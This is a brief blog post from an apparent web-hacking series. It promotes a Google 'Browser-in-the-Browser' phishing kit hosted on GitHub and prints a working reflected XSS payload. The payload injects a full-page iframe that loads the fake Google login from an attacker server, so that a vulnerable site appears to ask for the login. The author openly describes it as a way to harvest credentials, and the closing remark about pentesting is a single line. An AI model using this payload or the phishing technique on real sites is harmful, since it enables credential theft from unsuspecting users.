Week 21 - Google BITB
Last updated
Last updated
For week 21 of the web hacking series, I was looking to improve upon the GooglePhishing repository I made last week. I saw some of your comments/messages regarding using it with a Browser-in-the-Browser (BITB) attack. I thought this would allow for a super convincing phishing attack, so I did some research and built it out:
https://github.com/jakedmurphy1/GoogleBITB
I think this is one of the most convincing techniques I’ve seen in recent years. Definitely tricky if you are not paying close attention or familiar with web technologies.
Additionally, I discovered a pretty cool attack vector using BITB. You can inject the below Cross-Site Scripting payload into an application:
“><iframe style='border:none;width:100%;height:100%' scrolling='no' src='https://[ATTACKER_SERVER]/GoogleBITB/index.html'/>
And as long as the attacker server uses https, it will successfully render the iframe within an iframe (inception) and prompt the user to login to the Google popup, appearing to be from the vulnerable application. This technique can allow you to harvest credentials with just a reflected XSS attack!
This goes to show the dangers of allowing XSS within your application, and the importance of thorough pentesting.